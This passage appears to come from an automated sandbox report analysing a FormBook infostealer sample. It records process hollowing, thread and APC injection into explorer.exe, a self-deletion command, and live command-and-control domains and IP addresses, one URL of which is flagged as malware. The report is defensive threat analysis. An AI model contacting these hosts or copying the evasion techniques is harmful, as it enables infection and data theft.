          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04614257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04598A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.libreo.club
          Source: C:\Windows\explorer.exeDomain query: www.breathharbour.net
          Source: C:\Windows\explorer.exeDomain query: www.generalflix.com
          Source: C:\Windows\explorer.exeDomain query: www.vbkulkarni.com
          Source: C:\Windows\explorer.exeDomain query: www.pimpmyrecipe.com
          Source: C:\Windows\explorer.exeDomain query: www.csgo-roll.net
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.161.84.100 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.46.9.37 80
          Source: C:\Windows\explorer.exeDomain query: www.addthat.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeDomain query: www.foodsystemsjusticeproject.com
          Source: C:\Windows\explorer.exeDomain query: www.batiktintaemas.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 193.168.194.206 80
          Source: C:\Windows\explorer.exeDomain query: www.ronwongart.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.160.174.177 80
          Source: C:\Windows\explorer.exeDomain query: www.evecrude.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ly-iot.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RCS76393.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RCS76393.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RCS76393.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RCS76393.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RCS76393.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RCS76393.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1A0000
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: explorer.exe, 00000005.00000000.338938773.0000000004F80000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 2_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection512LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383936 Sample: RCS76393.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 4 other signatures 2->43 10 RCS76393.exe 2->10         started        process3 signatures4 51 Detected unpacking (changes PE section rights) 10->51 53 Tries to detect virtualization through RDTSC time measurements 10->53 13 RCS76393.exe 10->13         started        process5 signatures6 55 Modifies the context of a thread in another process (thread injection) 13->55 57 Maps a DLL or memory area into another process 13->57 59 Sample uses process hollowing technique 13->59 61 Queues an APC in another process (thread injection) 13->61 16 explorer.exe 13->16 injected process7 dnsIp8 27 www.foodsystemsjusticeproject.com 16->27 29 l.17986.net 104.160.174.177, 49723, 80 ST-BGPUS United States 16->29 31 17 other IPs or domains 16->31 33 System process connects to network (likely due to code injection or exploit) 16->33 35 Performs DNS queries to domains with low reputation 16->35 20 msiexec.exe 16->20         started        signatures9 process10 signatures11 45 Modifies the context of a thread in another process (thread injection) 20->45 47 Maps a DLL or memory area into another process 20->47 49 Tries to detect virtualization through RDTSC time measurements 20->49 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RCS76393.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.1.RCS76393.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msiexec.exe.4be7960.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.RCS76393.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          www.batiktintaemas.com/goei/100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.addthat.xyz
          		199.59.242.153
          		truetrue
            		unknown
            l.17986.net
            		104.160.174.177
            		truetrue
              		unknown
              batiktintaemas.com
              		193.168.194.206
              		truetrue
                		unknown
                www.ronwongart.com
                		104.161.84.100
                		truetrue
                  		unknown
                  ext-cust.squarespace.com
                  		198.185.159.144
                  		truefalse
                    		high
                    generalflix.com
                    		94.46.9.37
                    		truetrue
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truetrue
                        		unknown
                        foodsystemsjusticeproject.com
                        		34.102.136.180
                        		truefalse
                          		unknown
                          www.foodsystemsjusticeproject.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.batiktintaemas.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.libreo.club
                              		unknown
                              		unknowntrue
                                		unknown
                                www.breathharbour.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.generalflix.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.vbkulkarni.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.pimpmyrecipe.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.csgo-roll.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.evecrude.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.ly-iot.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              www.batiktintaemas.com/goei/true
                                              • Avira URL Cloud: malware
                                              		low

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmpfalse
                                                		high
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.tiro.comexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fonts.comexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
